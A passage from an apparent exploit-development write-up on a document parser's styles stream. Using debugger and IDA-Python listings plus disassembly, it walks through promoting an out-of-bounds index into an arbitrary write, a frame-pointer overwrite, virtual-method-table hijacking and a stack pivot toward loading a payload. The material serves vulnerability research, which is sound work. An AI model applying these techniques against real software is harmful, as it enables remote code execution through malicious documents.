If we capture the call stack at the point of the vulnerability being triggered, we can grab the layout of each frame, and use it to identify any fields that are +0x58 for case 7, or +0x4C - 4 for case 5.

Python> callstack = [0x3be11d03, 0x3be27501, 0x3be278b2, 0x3be2793e, 0x3c1fb083, 0x3c1fb495, 0x3c1fb4ef, 0x3be2795d]
Python> list(map(function.address, callstack))
[0x3be11906, 0x3be27048, 0x3be276be, 0x3be2790a, 0x3c1faf0f, 0x3c1fb3ed, 0x3c1fb4ab, 0x3be27954]

# Exchange each address in the backtrace with the function that owns it.
Python> functions = list(map(function.address, callstack))
Python> pp(list(map(function.name, functions)))
['object_9d0d30::readStyleType(2008)_391906',
 'struc_3a9de4::parseStylesContent_3a7048',
 'object_9c2044::parseStream(DocumentViewStyles,DocumentEditStyles)_3a76be',
 'object_9c2044::parseStream(DocumentViewStyles)_3a790a',
 'object_9c2044::method_processStreams_77af0f',
 'object_9c2044::vmethod_processStreamsTwice_77b3ed',
 'object_9e9d90::processDocumentByType_77b4ab',
 'sub_3BE27954']

# Grab the frame for each function and align them contiguously.
Python> frames = list(map(func.frame, functions))
Python> contiguous = struc.right(frames[-1], frames[-1:])

# Display all frame pointers along with the offset needed to overwrite them.
Python> for frame in contiguous: print("{:#x} : {}".format(frame.byname(' s').offset - 0x58, frame.byname(' s')))
-0x640 : <member '$ F3BE11906. s' index=22 offset=-0x5e8 size=+0x4 typeinfo='char[4]'>
-0x608 : <member '$ F3BE27048. s' index=3 offset=-0x5b0 size=+0x4 typeinfo='char[4]'>
-0x55c : <member '$ F3BE276BE. s' index=25 offset=-0x504 size=+0x4 typeinfo='char[4]'>
-0x53c : <member '$ F3BE2790A. s' index=0 offset=-0x4e4 size=+0x4 typeinfo='char[4]'>
-0x2cc : <member '$ F3C1FAF0F. s' index=9 offset=-0x274 size=+0x4 typeinfo='char[4]'>
-0x9c : <member '$ F3C1FB3ED. s' index=3 offset=-0x44 size=+0x4 typeinfo='char[4]'>
-0x78 : <member '$ F3C1FB4AB. s' index=0 offset=-0x20 size=+0x4 typeinfo='char[4]'>
-0x60 : <member '$ F3BE27954. s' index=0 offset=-0x8 size=+0x4 typeinfo='char[4]'>

# Gather them into a set.
Python> offsets = set(item.byname(' s').offset - 0x58 for item in contiguous)

# Display each frame and any of its members that contain one of the determined offsets.
Python> for frame in contiguous: print(frame), frame.members.list(offset=offsets), print()
<class 'structure' name='$ F3BE11906' offset=-0x6ac size=0xe4>
[20] -63c+0x50         wchar_t[40] 'lv_wstring(28)_54'  [(<class 'int'>, 2), 40]

<class 'structure' name='$ F3BE27048' offset=-0x5c8 size=0x38>

<class 'structure' name='$ F3BE276BE' offset=-0x590 size=0xa8>
[12] -55c:+0x4           int 'var_58'      (<class 'int'>, 4)
[20] -53c:+0x28 struc_3a9de4 'lv_struc_38' <class 'structure' name='struc_3a9de4' offset=-0x53c size=0x28>  # [note] Wanted object

<class 'structure' name='$ F3BE2790A' offset=-0x4e8 size=0x18>

<class 'structure' name='$ F3C1FAF0F' offset=-0x4d0 size=0x278>
[7]  -4a0+0x228           object_2f27f8 'lv_object_22c'      <class 'structure' name='object_2f27f8' offset=-0x4a0 size=0x228>

<class 'structure' name='$ F3C1FB3ED' offset=-0x258 size=0x230>
[1] -248+0x200        wchar_t[256] 'lv_wstring_204'    [(<class 'int'>, 2), 256]

<class 'structure' name='$ F3C1FB4AB' offset=-0x28 size=0x20>

<class 'structure' name='$ F3BE27954' offset=-0x8 size=0x18>

From this listing, we have only five results, only two of which appear to be pointing to a field that may be referenced. This number of results is small enough to verify manually and we discover that the field, lv_struc_38, which begins at exactly 0x58 bytes from a frame pointer is perfect for our 32-bit write. This field belongs to the frame for the function at 0x3BE276BE which is the method named object_9c2044::parseStream(DocumentViewStyles,DocumentEditStyles)_3a76be. Examining the prototypes of the functions called by this method shows that the object appears to only be used by a single method.

# Grab all of the calls for function 0x3BE276BE that do not use a register as its operand.
Python> calls = {ins.op_ref(ref) for ref in function.calls(0x3BE276BE) if not isinstance(ins.op(ref), register_t)}

# List all functions that we selected.
Python> db.functions.list(typed=True, ea=calls)
[0]  +0x109b2a : 0x3bb89b2a..0x3bb89b9e : (1) FvD+ : __thiscall object_10cbd2::get_field(3c)_109b2a          : lvars:1c args:2 refs:100  exits:1
[1]  +0x1329ce : 0x3bbb29ce..0x3bbb29e8 : (1) Fvt+ :    __cdecl object_OSEG::setCurrentStreamPosition_1329ce : lvars:00 args:5 refs:182  exits:1
[2]  +0x132a07 : 0x3bbb2a07..0x3bbb2a15 : (1) Fvt+ :    __cdecl object_OSEG::destroy_132a07                  : lvars:00 args:1 refs:270  exits:1
[3]  +0x132de4 : 0x3bbb2de4..0x3bbb2e41 : (1) FvT+ :    __cdecl object_OFRM::openStreamByName?_132de4        : lvars:08 args:4 refs:144  exits:1
[4]  +0x1a9adb : 0x3bc29adb..0x3bc29bff : (1) FvD+ : __thiscall sub_3BC29ADB                                 : lvars:68 args:1 refs:7    exits:1
[5]  +0x1cbf85 : 0x3bc4bf85..0x3bc4c3f2 : (1) FvD+ : __thiscall sub_3BC4BF85                                 : lvars:6c args:2 refs:6    exits:1
[6]  +0x1d5697 : 0x3bc55697..0x3bc558b7 : (1) FvD+ : __thiscall object_9bd120::method_1d5697                 : lvars:8c args:1 refs:6    exits:1
[7]  +0x2198ca : 0x3bc998ca..0x3bc9998f : (1) FvD+ : __thiscall sub_3BC998CA                                 : lvars:28 args:4 refs:38   exits:1
[8]  +0x3a7048 : 0x3be27048..0x3be27664 : (1) FvT+ : __thiscall struc_3a9de4::parseStylesContent_3a7048      : lvars:18 args:7 refs:2    exits:1
[9]  +0x3a7664 : 0x3be27664..0x3be276be : (1) FvT+ :    __cdecl object_OSEG::read_ushort_3a7664              : lvars:1c args:2 refs:90   exits:1
[10] +0x3a9547 : 0x3be29547..0x3be2955d : (1) FvD+ : __thiscall sub_3BE29547                                 : lvars:00 args:3 refs:5    exits:1
[11] +0x3a9638 : 0x3be29638..0x3be2963b : (1) FvD+ :  __unknown return_3a9638                                : lvars:00 args:0 refs:30   exits:1
[12] +0x3a9de4 : 0x3be29de4..0x3be29e05 : (1) FvD* : __thiscall constructor_3a9de4                           : lvars:00 args:1 refs:7    exits:1
[13] +0x7b15a6 : 0x3c2315a6..0x3c23161a : (1) FvD+ : __thiscall object_10cbd2::get_field(38)_7b15a6          : lvars:1c args:2 refs:36   exits:1
[14] +0x7b9e07 : 0x3c239e07..0x3c239e7c : (1) FvD+ : __thiscall object_10cbd2::get_field(34)_7b9e07          : lvars:1c args:2 refs:98   exits:1
[15] +0x8ea4fd : 0x3c36a4fd..0x3c36a50e : (1) LvD+ :  __unknown __EH_epilog3_GS                              : lvars:00 args:0 refs:2546 exits:0

# Grab all our results that are typed, and emit their prototype.
Python> for ea in db.functions(tag='__typeinfo__', ea=calls): print(function.tag(ea, '__typeinfo__'))
object_9bd184 *__thiscall object_10cbd2::get_field(3c)_109b2a(object_10cbd2 *this, __int16 avw_0)
int __cdecl object_OSEG::setCurrentStreamPosition_1329ce(JSVDA::object_OSEG *ap_oseg_0, int av_low_4, int av_high_8, int av_reset?_c, __int64 *ap_resultOffset_10)
int __cdecl object_OSEG::destroy_132a07(JSVDA::object_OSEG *ap_oseg_0)
int __cdecl object_OFRM::openStreamByName?_132de4(JSVDA::object_OFRM *ap_oframe_0, char *ap_streamName_4, int av_flags_8, JSVDA::object_OSEG **)
int __thiscall sub_3BC29ADB(object_9bd0e4 *this)
int __thiscall sub_3BC4BF85(object_9bd184 *this, int a2)
int __thiscall object_9bd120::method_1d5697(object_9bd120 *this)
int __thiscall sub_3BC998CA(object_9bd0e4 *this, int av_length_0, int av_field_4, int av_neg1_8)
int __thiscall struc_3a9de4::parseStylesContent_3a7048(struc_3a9de4 *this, JSVDA::object_OSEG *ap_oseg_0, int av_position(lo)_4, int av_position(hi)_8, int av_currentStreamState?_c, frame_3a7048_arg_10 ap_unkobjectunion_10, frame_3a7048_arg_14 ap_nullunion_14)
int __cdecl object_OSEG::read_ushort_3a7664(JSVDA::object_OSEG *ap_this_0, _WORD *ap_result_4)
_DWORD *__thiscall sub_3BE29547(_DWORD *this, __int16 arg_0, int arg_4)
void return_3a9638()
struc_3a9de4 *__thiscall constructor_3a9de4(struc_3a9de4 *this)
object_9bd120 *__thiscall object_10cbd2::get_field(38)_7b15a6(object_10cbd2 *this, __int16 avw_noCreate_0)
object_9bd0e4 *__thiscall object_10cbd2::get_field(34)_7b9e07(object_10cbd2 *this, __int16)
void __EH_epilog3_GS)

# Only this prototype references our object as its "this" parameter.
int __thiscall struc_3a9de4::parseStylesContent_3a7048(struc_3a9de4 *this, JSVDA::object_OSEG *ap_oseg_0, int av_position(lo)_4, int av_position(hi)_8, int av_currentStreamState?_c, frame_3a7048_arg_10 ap_unkobjectunion_10, frame_3a7048_arg_14 ap_nullunion_14)

From the results in the listing, it seems that the struc_3a9de4::parseStylesContent_3a7048 method references our desired type as its this parameter. During review of the struc_3a9de4::parseStylesContent_3a7048 method, the object represented by this is stored in the %edi register. Our goal is now to find a pointer to this structure either by being directly referenced or through the %edi register from this method. To find a candidate, we can manually walk from the call stack and enumerate all the places where the type is used, or we can utilize a debugger to monitor the places that reference anything within the structure. Fortunately, our search space is relatively small and we can easily find it in the following listing.

.text:3BE27048 000                 push    ebp
.text:3BE27049 004                 mov     ebp, esp
.text:3BE2704B 004                 sub     esp, 0Ch
.text:3BE2704E 010                 and     [ebp+lv_result_4], 0
.text:3BE27052 010                 push    ebx
.text:3BE27053 014                 mov     ebx, [ebp+ap_oseg_0]                             ; parameter: struc_3a9de4 *this
...
.text:3BE274D4     loc_3BE274D4:
.text:3BE274D4 01C                 mov     ecx, [ecx+object_9c2044.v_data_290.p_object_84]
.text:3BE274DA 01C                 mov     eax, [ecx+object_9c2d50.v_data_4.p_object_60]
.text:3BE274DD 01C                 test    eax, eax
.text:3BE274DF 01C                 jnz     short loc_3BE274EE
.text:3BE274E1 01C                 call    object_9c2d50::create_field(64)_6bf3a6
.text:3BE274E6 01C                 test    eax, eax
.text:3BE274E8 01C                 jz      loc_3BE27625
.text:3BE274EE
.text:3BE274EE     loc_3BE274EE:
.text:3BE274EE 01C                 lea     ecx, [ebp+lv_result_4]
.text:3BE274F1 01C                 push    ecx
.text:3BE274F2 020                 push    dword ptr [ebp+ap_unkobjectunion_10]
.text:3BE274F5 024                 mov     ecx, eax
.text:3BE274F7 024                 push    [edi+struc_3a9de4.v_documentType_8]
.text:3BE274FA 028                 push    [ebp+ap_oseg_0]
.text:3BE274FD 02C                 push    [edi+struc_3a9de4.v_header_long_4]
.text:3BE27500 030                 push    ebx                                              ; pushed onto stack
.text:3BE27501 034                 call    object_9d0d30::readStyleType(2008)_391906
.text:3BE27506 01C                 jmp     loc_3BE2736F

If we examine the caller of the object_9d0d30::readStyleType(2008)_391906, and traverse backward from it, the first call instruction that we encounter calls a method named object_9c2d50::create_field(64)_6bf3a6. This method is also called on the condition that a field, object_9c2d50::v_data_4::p_object_60 is initialized as zero. The relevant path from the beginning of the encompassing method to the conditionally called method is shown in the prior listing.

Due to both the object_9c2d50::create_field(64)_6bf3a6 and object_9d0d30::readStyleType(2008)_391906 functions being called by the same function, their frames are guaranteed to overlap. We aim to identify a function that preserves the %edi register as part of its prolog by performing a breadth-first search from the struc_3a9de4::parseStylesContent_3a7048 method and using the results to build a list of candidate call stacks that could be filtered.

The following listing combines the call stack from the scope of the vulnerability to identify the candidate range to use when filtering the results. In this listing, the range is from -0xAC to -0x58. By applying this filter to our candidates, we discover that the prolog for function 0x3BDFD8F8 stores several registers within this range. One of these registers is our desired %edi register, which is at offset -0xA4 in our listing. This overlaps with the lv_wstring(28)_54 field belonging to our vulnerable function's frame.

# Assign the callstacks that we will be comparing.
callstack_for_vulnerability =                           [0x3be11906, 0x3be27048]
callstack_for_conditional =     [0x3c36a51f, 0x3bdfd8f8, 0x3c13f3a6, 0x3be27048]

# Print out the first layout (right-aligned to offset 0).
Python> [frame.members for frame in struc.right(0, map(function.frame, callstack_for_vulnerability))]
[<class 'structure' name='$ F3BE11906' offset=-0x11c size=0xe4>
     -11c+0x10                                          [None, 16]
[0]  -10c+0x4                  int 'var_B4'             (<class 'int'>, 4)
[1]  -108+0x4                  int 'var_B0'             (<class 'int'>, 4)
[2]  -104+0x2              __int16 'var_AC'             (<class 'int'>, 2)
...
[8]   -c+0x4                 int 'av_currentStreamState?_c' (<class 'int'>, 4)      # [note] usually 2, and seems to be only used during function exit
[9]   -8+0x4 frame_3a7048_arg_10 'ap_unkobjectunion_10'     <class 'union' name='frame_3a7048_arg_10' offset=-0x8 size=0x4>
[10]  -4+0x4 frame_3a7048_arg_14 'ap_boxunion_14'           <class 'union' name='frame_3a7048_arg_14' offset=-0x4 size=0x4>] # [note] used by types 0x2008 and 0x2010

# Print out the second layout (right-aligned to offset 0).
Python> [frame.members for frame in struc.right(0, map(function.frame, callstack_for_conditional)))]
[<class 'structure' name='$ F3C36A51F' offset=-0x98 size=0x8>
[0] -98+0x4 char[4] ' r'    [(<class 'int'>, 1), 4]
[1] -94+0x4     int 'arg_0' (<class 'int'>, 4), <class 'structure' name='$ F3BDFD8F8' offset=-0x90 size=0x30>
    -90+0x10                      [None, 16]
[0] -80+0x4      int 'var_10'     (<class 'int'>, 4)
...
[5]  -18+0x4 JSVDA::object_OSEG* 'ap_oseg_0'                (<class 'type'>, 4)
[6]  -14+0x4                 int 'av_position(lo)_4'        (<class 'int'>, 4)
[7]  -10+0x4                 int 'av_position(hi)_8'        (<class 'int'>, 4)
[8]   -c+0x4                 int 'av_currentStreamState?_c' (<class 'int'>, 4)      # [note] usually 2, and seems to be only used during function exit
[9]   -8+0x4 frame_3a7048_arg_10 'ap_unkobjectunion_10'     <class 'union' name='frame_3a7048_arg_10' offset=-0x8 size=0x4>
[10]  -4+0x4 frame_3a7048_arg_14 'ap_boxunion_14'           <class 'union' name='frame_3a7048_arg_14' offset=-0x4 size=0x4>] # [note] used by types 0x2008 and 0x2010

# Emit the members from the vulnerability's backtrace that are worth dereferencing.
Python> [frame.members.list(bounds=(-0xc4, -0x58)) for frame in struc.right(0, map(function.frame, callstack_for_vulnerability))]
[19] -c4:+0x18 object_9d15a0*[6] 'lv_objects(6)_6c'  [(<class 'type'>, 4), 6]
[20] -ac:+0x50       wchar_t[40] 'lv_wstring(28)_54' [(<class 'int'>, 2), 40]
[21] -5c:+0x4                int 'var_4'             (<class 'int'>, 4)

# Emit the members within the other backtrace that overlaps "lv_wstring(28)_54".."var_4".
Python> [frame.members.list(bounds=(-0xac, -0x58)) for frame in struc.right(0, map(function.frame, callstack_for_conditional))]
[2] -ac:+0x4     int 'var_14'        (<class 'int'>, 4)
[3] -a8:+0x4     int 'lv_canary_10'  (<class 'int'>, 4)
[4] -a4:+0x4     int 'lv_reg(edi)_c' (<class 'int'>, 4)
[5] -a0:+0x4     int 'lv_reg(esi)_8' (<class 'int'>, 4)
[6] -9c:+0x4     int 'lv_reg(ebx)_4' (<class 'int'>, 4)
[7] -98:+0x4 char[4] ' r'            [(<class 'int'>, 1), 4]
[8] -94:+0x4     int 'arg_0'         (<class 'int'>, 4)
[0] -80:+0x4     int 'var_10'     (<class 'int'>, 4)
[1] -74:+0x4     int 'var_4'      (<class 'int'>, 4)
[2] -70:+0x4 char[4] ' s'         [(<class 'int'>, 1), 4]
[3] -6c:+0x4 char[4] ' r'         [(<class 'int'>, 1), 4]
[4] -68:+0x4     int 'ap_owner_0' (<class 'int'>, 4)
[5] -64:+0x4     int 'ap_owner_4' (<class 'int'>, 4)

There is a caveat, however, due to the object_9c2d50::create_field(64)_6bf3a6 method only being called when the object_9c2d50.v_data_4.p_object_60 field is initialized with 0x00000000. Hence, we will use the decompiler to locate all known global references to this field within our scope and use them to determine if there is some way that we may initialize this value.

Unfortunately from these results, it turns out that the object_9c2d50.v_data_4.p_object_60 field is only initialized upon entry and exit and requires that this object is not constructed by any of the other record types. Verifying this using the debugger shows that this condition prevents us from using any of the other available record types that were necessary to leverage this path.

However, there are still more candidates we can go through. Another is at the first function call inside struc_3a9de4::parseStylesContent_3a7048. This descends into the struc_3a9de4::readBoxHeader?_3a6fae function, which then depends on a method defined within the JSVDA.DLL library. The prolog of this method also pushes the %edi register onto the stack. If we set a memory access breakpoint on writing to this address and modify our document to avoid hitting any of the other conditionals that we’ve identified within the function, we can confirm that the preserved reference to lv_struc_38 is accessible to us within our desired range.

Finally, we’ve been able to expand the capabilities of our vulnerability, which was originally an out-of-bounds array index, to a relative dereference with a 32-bit write. Then we reused some of the capabilities within the function that contained the vulnerability to promote the vulnerability into an arbitrary length write to an absolute address. Afterward, we leveraged the control flow to allow us to perform a frame-pointer overwrite for the frame preserved by the object_9c2044::parseStream(DocumentEditStyles)_3a6cb2 method which belongs to its caller, the object_9c2044::method_processStreams_77af0f method. After the application has parsed our steam and returns to this method, we should have control of the frame pointer and the method’s local variables as a consequence. This should enable us to hijack execution more elegantly and still allow us to repair the damage that we’ve done with our vulnerability.

Hijacking frame pointer

Once we’ve developed the ability to control a frame pointer for a method that is still within our scope of processing our document, we can examine the frame and determine what might be available for us to modify with our present capabilities. The frame that we’ve overwritten in the prior section shows that we'll be able to control only a few variables. Unfortunately, at this point, the stream that we used to exercise the vulnerability has been closed, and if we tamper with this frame directly and the method ends up completing execution, the epilog of the function will fail due to its canary check resulting in fast-termination and process exit.

# List the frame belonging to the caller of the function containing the vulnerability.
<class 'structure' name='$ F3C1FAF0F' offset=-0x264 size=0x278>
[0]  -264+0x4                       int 'var_25C'            (<class 'int'>, 4)
[1]  -260+0x4                       int 'var_258'            (<class 'int'>, 4)
[2]  -25c+0x4                       int 'var_254'            (<class 'int'>, 4)
[3]  -258+0x4                       int 'var_250'            (<class 'int'>, 4)
[4]  -254+0x18  frame_77af0f::field_24c 'lv_struc_24c'       <class 'structure' name='frame_77af0f::field_24c' offset=-0x254 size=0x18>
[5]  -23c+0x4                       int 'lp_stackObject_234' (<class 'int'>, 4)
[6]  -238+0x4       JSVDA::object_OFRM* 'lp_oframe_230'      (<class 'type'>, 4)
[7]  -234+0x228           object_2f27f8 'lv_object_22c'      <class 'structure' name='object_2f27f8' offset=-0x234 size=0x228>
[8]    -c+0x4                       int 'lv_result_4'        (<class 'int'>, 4)
[9]    -8+0x4                   char[4] ' s'                 [(<class 'int'>, 1), 4]
[10]   -4+0x4                   char[4] ' r'                 [(<class 'int'>, 1), 4]
[11]    0+0x4       JSVDA::object_OFRM* 'ap_oframe_0'        (<class 'type'>, 4)
[12]    4+0x4              unsigned int 'av_documentType_4'  (<class 'int'>, 4)
[13]    8+0x4              unsigned int 'av_flags_8'         (<class 'int'>, 4)
[14]    c+0x4             struc_79aa9a* 'ap_stackobject_c'   (<class 'type'>, 4)
[15]   10+0x4                       int 'ap_null_10'         (<class 'int'>, 4)

# The object located at offset -0x238 of the frame.
<class 'structure' name='JSVDA::object_OFRM' size=0x8> // [alloc.tag] OFRM
[0] 0+0x4 int 'p_vftable_0' (<class 'int'>, 4) // [vftable] 0x278186F0
[1] 4+0x4 int 'v_index_4'   (<class 'int'>, 4) // {'note': 'object_117c5 handle', 'alloc.tag': 'MFCM', '__name__': 'v_index_4'}

This listing shows the contents of the object that we’ll be using. As previously mentioned, it contains a single field and is used to read from the document. This field is an integer representing an index into an array of objects within an entirely different module. Each object from this external array is an opened document which varies depending on the usage of the application. Hence, this field can be treated as a handle that might not be forgeable without knowledge of the contents of the module or the actions the user has already made.

However, we do have control of this object’s virtual method table reference, and since we haven't completely broken the application yet, we can capture the handle from elsewhere and use it to re-forge this object at a later stage once we've earned control of the stack. After this, we can then repair the frame during our loader to remain in good standing with the application.

.text:3C1FB1B6     loc_3C1FB1B6:
.text:3C1FB1B6 260                 push    [ebp+av_flags_8]
.text:3C1FB1B9 264                 mov     eax, [ebp+av_flags_8]
.text:3C1FB1BC 264                 push    ecx
.text:3C1FB1BD 268                 and     eax, 800h
.text:3C1FB1C2 268                 mov     ecx, esi
.text:3C1FB1C4 268                 push    ebx
.text:3C1FB1C5 26C                 mov     [ebp+lv_struc_24c.field_14], eax
.text:3C1FB1CB 26C                 call    object_9c2044::parseStream(DocumentViewStyles)_3a790a ; [note.exp] define some styles, ensure everything is initialized.
.text:3C1FB1D0 260                 mov     ebx, eax
.text:3C1FB1D2 260                 cmp     ebx, edi
.text:3C1FB1D4 260                 jnz     loc_3C1FAFD2

.text:3C1FB1DA 260                 push    [ebp+av_flags_8]
.text:3C1FB1DD 264                 mov     ecx, esi
.text:3C1FB1DF 264                 push    [ebp+av_documentType_4]
.text:3C1FB1E2 268                 push    [ebp+lp_oframe_230]
.text:3C1FB1E8 26C                 call    object_9c2044::parseStream(DocumentEditStyles)_3a6cb2 ; [note.exp] hijack frame pointer here
.text:3C1FB1ED 260                 mov     ebx, eax
.text:3C1FB1EF 260                 cmp     ebx, edi
.text:3C1FB1F1 260                 jnz     loc_3C1FAFD2

.text:3C1FB1F7 260                 push    [ebp+lp_stackObject_234]
.text:3C1FB1FD 264                 mov     ecx, [esi+2D8h] ; this
.text:3C1FB203 264                 push    [ebp+av_flags_8] ; av_flags_8
.text:3C1FB206 268                 push    [ebp+av_documentType_4] ; av_documentType_4
.text:3C1FB209 26C                 push    [ebp+lp_oframe_230] ; ap_oframe_0
.text:3C1FB20F 270                 call    object_10cbd2::processSomeStreams_778971 ; [note.exp] hijack execution here
.text:3C1FB214 264                 mov     ebx, eax
.text:3C1FB216 264                 cmp     ebx, edi
.text:3C1FB218 264                 jnz     loc_3C1FAFD2

The first place we'll be able to hijack execution is when the object owning the virtual method table that we’re taking control of is used to open up the next stream. The code that is listed shows the scope during which we control the frame pointer. In our exploit, this is where we hijack execution and completely pivot to a stack that we control to complete the necessary tasks for loading executable code into the address space.

.text:3C1FB1F7 260                 push    [ebp+lp_stackObject_234]
.text:3C1FB1FD 264                 mov     ecx, [esi+2D8h] ; this
.text:3C1FB203 264                 push    [ebp+av_flags_8] ; av_flags_8
.text:3C1FB206 268                 push    [ebp+av_documentType_4] ; av_documentType_4
.text:3C1FB209 26C                 push    [ebp+lp_oframe_230] ; ap_oframe_0
.text:3C1FB20F 270                 call    object_10cbd2::processSomeStreams_778971 ; [note.exp] hijack execution here
\
.text:3C1F8971 000                 push    0A4h
.text:3C1F8976 004                 mov     eax, offset byte_3C3CCE1A
.text:3C1F897B 004                 call    __EH_prolog3_catch_GS
.text:3C1F8980 0C4                 mov     edi, ecx
.text:3C1F8982 0C4                 mov     [ebp+lp_this_64], edi
...
.text:3C1F89B1 0C4                 lea     eax, [ebp+lp_stream_50]
.text:3C1F89B4 0C4                 push    eax
.text:3C1F89B5 0C8                 push    ebx
.text:3C1F89B6 0CC                 call    object_FRM::getStream(GroupingFileName)_1b974d
\
.text:3BC3974D 000                 push    ebp
.text:3BC3974E 004                 mov     ebp, esp
.text:3BC39750 004                 push    [ebp+ap_result_4] ; JSVDA::object_OSEG **
.text:3BC39753 008                 push    10h             ; av_flags_8
.text:3BC39755 00C                 push    offset str.GroupingFileName ; [OpenStreamByName.reference] 0x3bc3975d
.text:3BC3975A 010                 push    [ebp+ap_oframe_0] ; ap_oframe_0
.text:3BC3975D 014                 call    object_OFRM::openStreamByName?_132de4
\
.text:3BBB2DE4 000                 push    ebp
.text:3BBB2DE5 004                 mov     ebp, esp
.text:3BBB2DE7 004                 push    ecx
.text:3BBB2DE8 008                 mov     eax, ___security_cookie
.text:3BBB2DED 008                 xor     eax, ebp
.text:3BBB2DEF 008                 mov     [ebp+var_4], eax
...
.text:3BBB2E1D     loc_3BBB2E1D:
.text:3BBB2E1D 00C                 push    [ebp+ap_result_c]
.text:3BBB2E20 010                 mov     ecx, [ebp+ap_oframe_0]
.text:3BBB2E23 010                 push    0
.text:3BBB2E25 014                 push    [ebp+av_flags_8]
.text:3BBB2E28 018                 mov     edx, [ecx+JSVDA::object_OFRM.p_vftable_0] ; [note.exp] this is ours
.text:3BBB2E2A 018                 push    0
.text:3BBB2E2C 01C                 push    eax
.text:3BBB2E2D 020                 push    ecx
.text:3BBB2E2E 024                 call    dword ptr [edx+10h] ; [note.exp] branch here
\
; int __stdcall object_OFRM::method_openStream_2b5c5(JSVDA::object_OFRM *ap_this_0, wchar_t *ap_streamName_4, int a_unused_8, char avb_flags_c, int a_unused_10, JSVDA::object_OSEG **ap_result_14)
.text:277CB5C5     object_OFRM::method_openStream_2b5c5 proc near
.text:277CB5C5
.text:277CB5C5 000                 push    ebp
.text:277CB5C6 004                 mov     ebp, esp
.text:277CB5C8 004                 push    ecx
.text:277CB5C9 008                 push    ecx
.text:277CB5CA 00C                 push    ebx
.text:277CB5CB 010                 mov     ebx, [ebp+ap_result_14]
...

In the listing, we descend through the different methods that get called during execution until we reach a virtual method named JSVDA::object_OFRM::method_openStream_2b5c5. This method is dereferenced and then called to open up the next stream from the document. This is the virtual method that we will be using to hijack execution.

The JSVDA::object_OFRM::method_openStream_2b5c5 virtual method belongs to the JSVDA.DLL module and takes six parameters before being called. This will need to be taken into account during our repurposing. As the stack will be adjusted by the implementation pushing said parameters and the preserved return address onto the stack, we will be required to include this adjustment in our new frame.

At this point, we have everything we need to execute code. However, we’ll need some way to resume execution after our instructions have been executed. To accomplish this, we’ll need to pivot the stack to one that we control. Generally, there are two ways in which we can pivot the stack. One way is to find a predictable address that we can write the addresses into, and then use a pivot that lets us perform an explicit assignment of that address to the %esp register. Another way is to adjust the %esp register to reference a part of the stack where we control its contents. To avoid having to write another contiguous chunk of data to a some known location using the vulnerability, the latter methodology was chosen as the primary candidate.

Pivoting Stack Pointer

Although we control a frame pointer and can use it to assign an arbitrary value to the instruction pointer, we do not have a clear way to execute multiple sequences of instructions to load executable code from our document. Hence, we need some way to set the stack pointer to a block of memory that we can use to resume execution after executing each chunk required to load our payload.

As mentioned previously, the vulnerability occurs within the very first stream that is parsed by the target. Hence, due to our document not being able to influence much in the application, it is necessary to find logic within the stream parser to satisfy our needs. As we’re attempting to execute code residing at multiple locations within a module, we’ll need some logic within the stream parsing implementation that can be used to load a large amount of our data into the application’s stack. To discover this, we can use a quick script at the entry point of the style record parser to enumerate all of the functions being called and identify the ones that have the large size allocated for its frame.

In the following query, it appears that object_9c2044::readStyleType(1000)_4d951d is a likely candidate. Through manual reversing of the method, we can prove that its implementation allocates 0x18C8 bytes on the stack and reads 0x1000 bytes from its associated record directly into this allocated buffer.

# Grab the address of the function containing the different cases for record parsing
Python> f = db.a('struc_3a9de4::parseStylesContent_3a7048')

# List all functions that are called that also have a frame.
Python> db.functions.list(frame=True, ea=[ins.op_ref(oref) for oref in func.calls(f) if 'x' in oref])
[0]  +0x0b8d12 : 0x3bb38d12..0x3bb38d71 : (1) FvD+ : __thiscall object_9c2d50::get_field(180)_b8d12                  : lvars:001c args:2 refs:7   exits:1
[1]  +0x109b2a : 0x3bb89b2a..0x3bb89b9e : (1) FvD+ : __thiscall object_10cbd2::get_field(3c)_109b2a                  : lvars:001c args:2 refs:100 exits:1
[2]  +0x1329ce : 0x3bbb29ce..0x3bbb29e8 : (1) Fvt+ :    __cdecl object_OSEG::setCurrentStreamPosition_1329ce         : lvars:0000 args:5 refs:182 exits:1
[3]  +0x1b6bf7 : 0x3bc36bf7..0x3bc36d66 : (1) FvD* : __thiscall object_9e5ffc::readStyleType(1000)_1b6bf7            : lvars:0044 args:4 refs:1   exits:1
[4]  +0x1b8cd2 : 0x3bc38cd2..0x3bc38d0b : (1) FvD* : __thiscall object_9e5ffc::readStyleType(1001)_1b8cd2            : lvars:0004 args:4 refs:1   exits:1
[5]  +0x1b8f99 : 0x3bc38f99..0x3bc39723 : (1) FvD* : __thiscall object_9bd0e4::readStyleType(2001)_1b8f99            : lvars:00a0 args:7 refs:2   exits:1
[6]  +0x1cdcf6 : 0x3bc4dcf6..0x3bc4df7b : (1) FvD* : __thiscall object_9bd184::readStyleType(2002)_1cdcf6            : lvars:0040 args:5 refs:1   exits:1
[7]  +0x1d24a9 : 0x3bc524a9..0x3bc52bef : (1) FvD* : __thiscall object_9bd0e4::readStyleType(2001)_1d24a9            : lvars:00b4 args:6 refs:1   exits:1
[8]  +0x1d63a3 : 0x3bc563a3..0x3bc56601 : (1) FvT* : __thiscall object_9bd120::readStyleType(2003)_1d63a3            : lvars:0094 args:5 refs:1   exits:1
[9]  +0x391906 : 0x3be11906..0x3be11d9c : (1) FvT* : __thiscall object_9d0d30::readStyleType(2008)_391906            : lvars:00c4 args:7 refs:1   exits:2
[10] +0x392cab : 0x3be12cab..0x3be12ee2 : (1) FvT* : __thiscall object_9d0d30::readStyleType(2010)_392cab            : lvars:0064 args:7 refs:1   exits:1
[11] +0x393e4b : 0x3be13e4b..0x3be13f08 : (1) F-D+ :    __cdecl object_OSEG::pushCurrentStream?_393e4b               : lvars:000c args:5 refs:1   exits:1
[12] +0x3a6bec : 0x3be26bec..0x3be26cb2 : (1) FvD* : __thiscall struc_3a9de4::readStyleType(2005)_3a6bec             : lvars:0014 args:4 refs:1   exits:1
[13] +0x3a6cf0 : 0x3be26cf0..0x3be26d44 : (1) FvD+ :    __cdecl object_OSEG::decode_long_3a6cf0                      : lvars:001c args:2 refs:86  exits:1
[14] +0x3a6d44 : 0x3be26d44..0x3be26d8b : (1) FvT+ : __thiscall box_header::deserialize_3a6d44                       : lvars:000c args:2 refs:7   exits:1
[15] +0x3a6d8b : 0x3be26d8b..0x3be26fae : (1) F-T+ : __thiscall struc_3a9de4::ensureFieldObjectsConstructed??_3a6d8b : lvars:0008 args:2 refs:11  exits:1
